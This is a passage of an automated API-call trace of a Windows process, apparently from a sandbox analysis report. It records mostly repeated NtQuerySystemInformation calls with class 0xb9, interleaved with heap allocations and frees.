SystemInformation=0xa781ffda00, Length=0x50, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6c0, Length=0x28, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd740, Length=0x28, ResultLength=0x0) [0233.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd740, Length=0x28, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5e0, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd560, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd560, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd560, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6a0, Length=0x20, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd630, Length=0x20, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd630, Length=0x20, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.411] GetProcessHeap () returned 0x269489b0000 [0233.411] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26948a04660 [0233.411] GetProcessHeap () returned 0x269489b0000 [0233.411] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x2694959daa0 [0233.411] GetProcessHeap () returned 0x269489b0000 [0233.411] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x124) returned 0x269489bb550 [0233.413] GetProcessHeap () returned 0x269489b0000 [0233.413] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x130) returned 0x26948a40400 [0233.413] GetProcessHeap () returned 0x269489b0000 [0233.413] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x269495cf4a0 [0233.413] GetProcessHeap () returned 0x269489b0000 [0233.413] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x138) returned 0x26948aa4590 [0233.413] GetProcessHeap () returned 0x269489b0000 [0233.413] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26948a050b0 [0233.413] GetProcessHeap () returned 0x269489b0000 [0233.413] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x2694959d9a0 [0233.413] GetProcessHeap () returned 0x269489b0000 [0233.413] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a23590 | out: hHeap=0x269489b0000) returned 1 [0233.414] GetProcessHeap () returned 0x269489b0000 [0233.414] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1ec) returned 0x26948a45ae0 [0233.414] GetProcessHeap () returned 0x269489b0000 [0233.414] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1000f4) returned 0x2694979a040 [0233.503] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa781ffdcb8 | out: phModule=0xa781ffdcb8*=0x7ffcea380000) returned 1 [0233.503] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0233.503] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa781ffdde0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa781ffdde0, ResultLength=0x0) returned 0x0 [0233.529] GetProcessHeap () returned 0x269489b0000 [0233.529] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x269495cf620 [0233.529] GetProcessHeap () returned 0x269489b0000 [0233.529] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x2d30) returned 0x26948a55d00 [0233.529] GetProcessHeap () returned 0x269489b0000 [0233.529] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26948a03f80 [0233.529] GetProcessHeap () returned 0x269489b0000 [0233.529] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x2694959dab0 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x2d1c) returned 0x26948a5b770 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a40400 | out: hHeap=0x269489b0000) returned 1 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948aa4590 | out: hHeap=0x269489b0000) returned 1 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a050b0 | out: hHeap=0x269489b0000) returned 1 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x2694959d9a0 | out: hHeap=0x269489b0000) returned 1 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269495cf4a0 | out: hHeap=0x269489b0000) returned 1 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a45ae0 | out: hHeap=0x269489b0000) returned 1 [0233.534] GetProcessHeap () returned 0x269489b0000 [0233.534] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x2694979a040 | out: hHeap=0x269489b0000) returned 1 [0233.539] GetProcessHeap () returned 0x269489b0000 [0233.539] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a55d00 | out: hHeap=0x269489b0000) returned 1 [0233.539] GetProcessHeap () returned 0x269489b0000 [0233.539] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a03f80 | out: hHeap=0x269489b0000) returned 1 [0233.539] GetProcessHeap () returned 0x269489b0000 [0233.539] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x2694959dab0 | out: hHeap=0x269489b0000) returned 1 [0233.539] GetProcessHeap () returned 0x269489b0000 [0233.539] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269495cf620 | out: hHeap=0x269489b0000) returned 1 [0233.539] GetProcessHeap () returned 0x269489b0000 [0233.539] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a58a40 | out: hHeap=0x269489b0000) returned 1 [0233.541] GetProcessHeap () returned 0x269489b0000 [0233.541] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489bb550 | out: hHeap=0x269489b0000) returned 1 [0233.541] GetProcessHeap () returned 0x269489b0000 [0233.541] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a5b770 | out: hHeap=0x269489b0000) returned 1 [0233.541] GetProcessHeap () returned 0x269489b0000 [0233.541] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a04660 | out: hHeap=0x269489b0000) returned 1 [0233.541] GetProcessHeap () returned 0x269489b0000 [0233.541] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x2694959daa0 | out: hHeap=0x269489b0000) returned 1 [0233.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.545] LocalAlloc (uFlags=0x0, uBytes=0x118) returned 0x26948a40400 [0233.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde10, Length=0x30, ResultLength=0x0) [0233.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x30, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x30, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.553] GetProcessHeap () returned 0x269489b0000 [0233.553] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x2c) returned 0x269495cf620 [0233.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.582] GetProcessHeap () returned 0x269489b0000 [0233.582] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x26949596090 [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] GetProcessHeap () returned 0x269489b0000 [0233.584] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x26949595e60 [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] GetProcessHeap () returned 0x269489b0000 [0233.588] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x30) returned 0x269495cf760 [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation 